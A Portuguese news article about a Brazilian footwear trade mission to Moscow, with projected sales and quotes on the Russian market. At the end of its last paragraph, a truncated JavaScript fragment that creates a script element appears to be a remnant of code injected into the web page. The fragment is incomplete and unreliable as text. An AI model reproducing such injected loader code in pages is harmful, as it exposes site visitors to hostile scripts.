Na Rússia, calçadistas brasileiros negociam US$ 4,12 milhões

No showroom, montado num hotel da capital russa, as marcas brasileiras receberam mais de 70 empresas de varejo e distribuição interessadas em trabalhar com o Brasil. Foto: Divulgação

A quinta Missão Comercial à Rússia, que reuniu 34 marcas brasileiras de calçados em Moscou, superou as expectativas. Houve 300 contatos com potenciais compradores internacionais, que devem gerar US$ 4,12 milhões em negócios, de acordo com estimativa dos organizadores. “Superou as nossas expectativas em temos de números, tanto de participantes, quanto de visitantes locais”, disse Roberta Ramos, gestora de projetos da Associação Brasileira das Indústrias de Calçados (Abicalçados), uma das promotoras da iniciativa.

No showroom, montado num hotel da capital russa, as marcas brasileiras receberam mais de 70 empresas de varejo e distribuição interessadas em trabalhar com o Brasil. O evento aconteceu entre os dias 5 e 7 deste mês. “Depois de um longo período de crise, com um PIB deficitário de 4,5% em 2016, o primeiro semestre de 2017 já apresenta um superávit de 0,5%. A previsão do governo russo para 2017 é de um crescimento ainda de mais 1,5% até o final do ano”, disse Almir Américo, chefe do escritório da Apex-Brasil Eurásia, que organizou a missão com a Abicalçados.

A recuperação, de acordo com Almir Américo, ainda é lenta, pois passa por uma mudança de comportamento do consumidor, que, com a crise, deixou de comprar de forma impulsiva, reduzindo o consumo de bens como os calçados. No entanto, segundo Oleg Chvedok, distribuidor de calçados, a crise gerou uma renovação dos agentes do mercado e uma aproximação entre varejistas e fabricantes, que até então optavam por utilizar os serviços de um distribuidor para importação, transporte e desembaraço.

“O lado bom dessa mudança é que agora o preço do calçado não é mais determinado pelo distribuidor russo, e sim pelo próprio fabricante, que fica mais competitivo para o varejo”, explicou o distribuidor. Outro fator de destaque no evento foram os negócios realizados com marca própria, que devem representar 90% do total estimado.var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário